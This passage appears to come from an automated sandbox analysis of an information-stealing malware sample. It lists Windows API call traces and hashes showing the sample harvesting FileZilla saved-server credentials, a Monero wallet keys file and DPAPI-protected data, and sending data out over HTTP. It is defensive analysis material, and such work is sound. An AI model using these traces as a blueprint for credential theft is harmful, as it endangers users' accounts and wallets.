                                   • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                  • String ID:
                                  • API String ID: 420147892-0
                                  • Opcode ID: 57692f40629fd3ee3bf8016f4e607daa11d6f2f91c87cf0f4c7afd98379bbd06
                                  • Instruction ID: 8a2dcb17ad10686a51896337a94aaa30d1e41a4ef1405863006d331114f47cdb
                                  • Opcode Fuzzy Hash: 57692f40629fd3ee3bf8016f4e607daa11d6f2f91c87cf0f4c7afd98379bbd06
                                  • Instruction Fuzzy Hash: AA011E75A00208FBDB15DFA5CD49BEEBBF8FB48345F108198A90997240D7349B80CF51
                                  APIs
                                  • CryptBinaryToStringA.CRYPT32(00000000,00535184,40000001,00000000,00000000,?,00535184), ref: 00548EC0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                   • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: BinaryCryptString
                                  • String ID:
                                  • API String ID: 80407269-0
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,011FE188,00000000,?,00550E10,00000000,?,00000000,00000000), ref: 00547A63
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00547A6A
                                  • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,011FE188,00000000,?,00550E10,00000000,?,00000000,00000000,?), ref: 00547A7D
                                  • wsprintfA.USER32 ref: 00547AB7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                  • String ID:
                                  • API String ID: 3317088062-0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: BY7{$cAy}$u9>]
                                  • API String ID: 0-1575426848
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: (!0$W-$f~
                                  • API String ID: 0-3915272384
                                  APIs
                                  • CoCreateInstance.COMBASE(0054E118,00000000,00000001,0054E108,00000000), ref: 00543758
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 005437B0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharCreateInstanceMultiWide
                                  • String ID:
                                  • API String ID: 123533781-0
                                  APIs
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00539B84
                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 00539BA3
                                  • LocalFree.KERNEL32(?), ref: 00539BD3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Local$AllocCryptDataFreeUnprotect
                                  • String ID:
                                  • API String ID: 2068576380-0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: AC_;$tQU-
                                  • API String ID: 0-212051768
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: wCg$zy.
                                  • API String ID: 0-2400310284
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e75064dd7227314b9ab46295f5902b8aaa135b690cc9cd01f6ae3c67cf528c29
                                  • Instruction ID: ec02138b82012026a9b3662f9c69c10f1aa8fb1b1b821d5f42c1c882f9722110
                                  • Opcode Fuzzy Hash: e75064dd7227314b9ab46295f5902b8aaa135b690cc9cd01f6ae3c67cf528c29
                                  • Instruction Fuzzy Hash: 405157F3B053185BE304692DDCD837AB6DAEBE4360F2B863DCA8587784E93A1C054291
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5178c9d7eea0d45632a0a477ace117da16dd62cbbf898329837c191e2bdd1e02
                                  • Instruction ID: 400af9343d5bb1155345412e0ef44d361e2ac092719e0a203e477b3d53487051
                                  • Opcode Fuzzy Hash: 5178c9d7eea0d45632a0a477ace117da16dd62cbbf898329837c191e2bdd1e02
                                  • Instruction Fuzzy Hash: E35127F3A182005BE3106A29DC857ABB7D6EFD4720F1A853DEBD483744EE3998058687
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 967f987117a374570d0077c31071536a4f715f09350791eb1f9220a151ce4956
                                  • Instruction ID: 4af74099220406cfe69e7db3ed6ef597712bb995cc11385b3f8e8044e771d263
                                  • Opcode Fuzzy Hash: 967f987117a374570d0077c31071536a4f715f09350791eb1f9220a151ce4956
                                  • Instruction Fuzzy Hash: DD413CF3A192105BF308A938EDD57BBB6D6EBD4320F1AC53DD685D7B88D838490182D6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2a70b4e71cb9fb35e0e8ff95bc75ba44e438fdf6719651e54f3139d82b5bd039
                                  • Instruction ID: aa3f60f8e397c3ddccff19febcf8a8ee62ffebc3115b91330f118b1fa0d89c6b
                                  • Opcode Fuzzy Hash: 2a70b4e71cb9fb35e0e8ff95bc75ba44e438fdf6719651e54f3139d82b5bd039
                                  • Instruction Fuzzy Hash: 094125F3F185104BF314992DDC4536A76D6D7D4321F2B863EDB99DB7C8E83988064289
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 119e63144c435dc088dbd6add9070588762249716d2ce75e1323d1810cb9b9c0
                                  • Instruction ID: 0978c06b0b136d14f9eded556c29a04c2abba182e06286d72e7d782cf2536aa9
                                  • Opcode Fuzzy Hash: 119e63144c435dc088dbd6add9070588762249716d2ce75e1323d1810cb9b9c0
                                  • Instruction Fuzzy Hash: C44115F3E143248BE3446E6CDCC4366B6D5EB58320F1A063DDE99D3780EA7A6D058692
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                  • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                  • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                  • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                  APIs
                                    • Part of subcall function 0054A740: lstrcpy.KERNEL32(00550E17,00000000), ref: 0054A788
                                    • Part of subcall function 00548DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00548E0B
                                    • Part of subcall function 0054A920: lstrcpy.KERNEL32(00000000,?), ref: 0054A972
                                    • Part of subcall function 0054A920: lstrcat.KERNEL32(00000000), ref: 0054A982
                                    • Part of subcall function 0054A8A0: lstrcpy.KERNEL32(?,00550E17), ref: 0054A905
                                    • Part of subcall function 0054A9B0: lstrlen.KERNEL32(?,011F8F68,?,\Monero\wallet.keys,00550E17), ref: 0054A9C5
                                    • Part of subcall function 0054A9B0: lstrcpy.KERNEL32(00000000), ref: 0054AA04
                                    • Part of subcall function 0054A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0054AA12
                                    • Part of subcall function 0054A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0054A7E6
                                    • Part of subcall function 005399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005399EC
                                    • Part of subcall function 005399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00539A11
                                    • Part of subcall function 005399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00539A31
                                    • Part of subcall function 005399C0: ReadFile.KERNEL32(000000FF,?,00000000,0053148F,00000000), ref: 00539A5A
                                    • Part of subcall function 005399C0: LocalFree.KERNEL32(0053148F), ref: 00539A90
                                    • Part of subcall function 005399C0: CloseHandle.KERNEL32(000000FF), ref: 00539A9A
                                    • Part of subcall function 00548E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00548E52
                                  • GetProcessHeap.KERNEL32(00000000,000F423F,00550DBA,00550DB7,00550DB6,00550DB3), ref: 00540362
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00540369
                                  • StrStrA.SHLWAPI(00000000,<Host>), ref: 00540385
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00550DB2), ref: 00540393
                                  • StrStrA.SHLWAPI(00000000,<Port>), ref: 005403CF
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00550DB2), ref: 005403DD
                                  • StrStrA.SHLWAPI(00000000,<User>), ref: 00540419
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00550DB2), ref: 00540427
                                  • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00540463
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00550DB2), ref: 00540475
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00550DB2), ref: 00540502
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00550DB2), ref: 0054051A
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00550DB2), ref: 00540532
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00550DB2), ref: 0054054A
                                  • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00540562
                                  • lstrcat.KERNEL32(?,profile: null), ref: 00540571
                                  • lstrcat.KERNEL32(?,url: ), ref: 00540580
                                  • lstrcat.KERNEL32(?,00000000), ref: 00540593
                                  • lstrcat.KERNEL32(?,00551678), ref: 005405A2
                                  • lstrcat.KERNEL32(?,00000000), ref: 005405B5
                                  • lstrcat.KERNEL32(?,0055167C), ref: 005405C4
                                  • lstrcat.KERNEL32(?,login: ), ref: 005405D3
                                  • lstrcat.KERNEL32(?,00000000), ref: 005405E6
                                  • lstrcat.KERNEL32(?,00551688), ref: 005405F5
                                  • lstrcat.KERNEL32(?,password: ), ref: 00540604
                                  • lstrcat.KERNEL32(?,00000000), ref: 00540617
                                  • lstrcat.KERNEL32(?,00551698), ref: 00540626
                                  • lstrcat.KERNEL32(?,0055169C), ref: 00540635
                                  • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00550DB2), ref: 0054068E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                  • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                  • API String ID: 1942843190-555421843
                                  APIs
                                    • Part of subcall function 0054A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0054A7E6
                                    • Part of subcall function 005347B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00534839
                                    • Part of subcall function 005347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00534849
                                    • Part of subcall function 0054A740: lstrcpy.KERNEL32(00550E17,00000000), ref: 0054A788
                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 005359F8
                                  • StrCmpCA.SHLWAPI(?,011FE878), ref: 00535A13
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00535B93
                                  • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,011FE8F8,00000000,?,011FA240,00000000,?,00551A1C), ref: 00535E71
                                  • lstrlen.KERNEL32(00000000), ref: 00535E82
                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00535E93
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00535E9A
                                  • lstrlen.KERNEL32(00000000), ref: 00535EAF
                                  • lstrlen.KERNEL32(00000000), ref: 00535ED8
                                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00535EF1
                                  • lstrlen.KERNEL32(00000000,?,?), ref: 00535F1B
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00535F2F
                                  • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00535F4C
                                  • InternetCloseHandle.WININET(00000000), ref: 00535FB0
                                  • InternetCloseHandle.WININET(00000000), ref: 00535FBD
                                  • HttpOpenRequestA.WININET(00000000,011FE7A8,?,011FE158,00000000,00000000,00400100,00000000), ref: 00535BF8
                                    • Part of subcall function 0054A9B0: lstrlen.KERNEL32(?,011F8F68,?,\Monero\wallet.keys,00550E17), ref: 0054A9C5
                                    • Part of subcall function 0054A9B0: lstrcpy.KERNEL32(00000000), ref: 0054AA04
                                    • Part of subcall function 0054A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0054AA12
                                    • Part of subcall function 0054A8A0: lstrcpy.KERNEL32(?,00550E17), ref: 0054A905
                                    • Part of subcall function 0054A920: lstrcpy.KERNEL32(00000000,?), ref: 0054A972
                                    • Part of subcall function 0054A920: lstrcat.KERNEL32(00000000), ref: 0054A982
                                  • InternetCloseHandle.WININET(00000000), ref: 00535FC7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                  • String ID: "$"$------$------$------
                                  • API String ID: 874700897-2180234286
                                  • Opcode ID: 00cbaaa633e39916c074f4ae8241550bdbe5036373c1f85126197af0bd145fc2
                                  • Instruction ID: 9a3b80e4ca1018e6a9db3cc260a58b7e3356074a92fbd1a71ac899f093b85a28
                                  • Opcode Fuzzy Hash: 00cbaaa633e39916c074f4ae8241550bdbe5036373c1f85126197af0bd145fc2
                                  • Instruction Fuzzy Hash: 45123272860119ABEB55EBA0DC99FEEBB78FF94704F404199F10A62091EF302B49CF55
                                  APIs
                                    • Part of subcall function 0054A740: lstrcpy.KERNEL32(00550E17,00000000), ref: 0054A788
                                    • Part of subcall function 0054A9B0: lstrlen.KERNEL32(?,011F8F68,?,\Monero\wallet.keys,00550E17), ref: 0054A9C5
                                    • Part of subcall function 0054A9B0: lstrcpy.KERNEL32(00000000), ref: 0054AA04
                                    • Part of subcall function 0054A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0054AA12
                                    • Part of subcall function 0054A8A0: lstrcpy.KERNEL32(?,00550E17), ref: 0054A905
                                    • Part of subcall function 00548B60: GetSystemTime.KERNEL32(00550E1A,011FA450,005505AE,?,?,005313F9,?,0000001A,00550E1A,00000000,?,011F8F68,?,\Monero\wallet.keys,00550E17), ref: 00548B86
                                    • Part of subcall function 0054A920: lstrcpy.KERNEL32(00000000,?), ref: 0054A972
                                    • Part of subcall function 0054A920: lstrcat.KERNEL32(00000000), ref: 0054A982
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0053CF83
                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0053D0C7
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0053D0CE
                                  • lstrcat.KERNEL32(?,00000000), ref: 0053D208
                                  • lstrcat.KERNEL32(?,00551478), ref: 0053D217
                                  • lstrcat.KERNEL32(?,00000000), ref: 0053D22A
